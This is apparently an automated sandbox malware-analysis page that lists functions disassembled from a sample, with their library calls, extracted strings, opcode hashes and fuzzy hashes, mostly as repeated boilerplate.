                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                                            • String ID: /?#$://
                                                                                                                                                                                            • API String ID: 2427045233-1756703676
                                                                                                                                                                                            • Opcode ID: 6b809667ebc0690d7e1bc766a8afb3540ba3e58ab98ab58ed28939c5ad2c45d1
                                                                                                                                                                                            • Instruction ID: 412e8a15658a45b40e6c517228019a8139df78e4ebbaed47cdc33baa111895db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b809667ebc0690d7e1bc766a8afb3540ba3e58ab98ab58ed28939c5ad2c45d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B1157715303648ECF2D9F245C997FA7A649B41324F6002ADE562571C3CBB149B48EA0
                                                                                                                                                                                            Function 00217B46 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00217B4D
                                                                                                                                                                                              • Part of subcall function 0020A6BD: __EH_prolog3.LIBCMT ref: 0020A6C4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                                            • String ID: 3e3$4e4
                                                                                                                                                                                            • API String ID: 431132790-2404590204
                                                                                                                                                                                            • Opcode ID: 13b0bd5d956bbed603a0582478526431f5d2c05730a7722bbe151abb34ab832c
                                                                                                                                                                                            • Instruction ID: 6823ce884f0b489b7477ab11d78ed7b3e69fa6f0fab16fa612132a210d88b88e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b0bd5d956bbed603a0582478526431f5d2c05730a7722bbe151abb34ab832c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D11E571A20709AFDB58EFBCC84569EB6F4AB44324F104B3EE026D32D2CB748E148B51
                                                                                                                                                                                            Function 00216D27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                                            • String ID: : 0x$invalid UTF-8 byte at index
                                                                                                                                                                                            • API String ID: 431132790-1231261809
                                                                                                                                                                                            • Opcode ID: 647ba802f4b7e98095dfc73d69b2b8073608e1bab5bb667fb4fb00bda1522832
                                                                                                                                                                                            • Instruction ID: a235d7c81e1c175280541d8a94aecd73b665fc4d7736032bcd53f8fd6d165a98
                                                                                                                                                                                            • Opcode Fuzzy Hash: 647ba802f4b7e98095dfc73d69b2b8073608e1bab5bb667fb4fb00bda1522832
                                                                                                                                                                                            • Instruction Fuzzy Hash: AA012C70B14305ABDB48AF78D8C155DB6A16F48304B40487DB406EB383CA7499248F55
                                                                                                                                                                                            Function 002156A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002156AA
                                                                                                                                                                                              • Part of subcall function 002168CD: __EH_prolog3.LIBCMT ref: 002168D4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                            • String ID: .txt$1735725670
                                                                                                                                                                                            • API String ID: 3355343447-527677385
                                                                                                                                                                                            • Opcode ID: d6867d4b9590dd29e8debf030050cce1d2a52fddf77d7b8e78402c725991ba93
                                                                                                                                                                                            • Instruction ID: 069fcd7b590d92c70b809942d9ad5be44fd06e13e6c07e8f52bc908952981e3f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d6867d4b9590dd29e8debf030050cce1d2a52fddf77d7b8e78402c725991ba93
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201AD71A21718CBCF09EBA0E86AADCB7B1AF58321F508119E101270D3DF705E55CF9A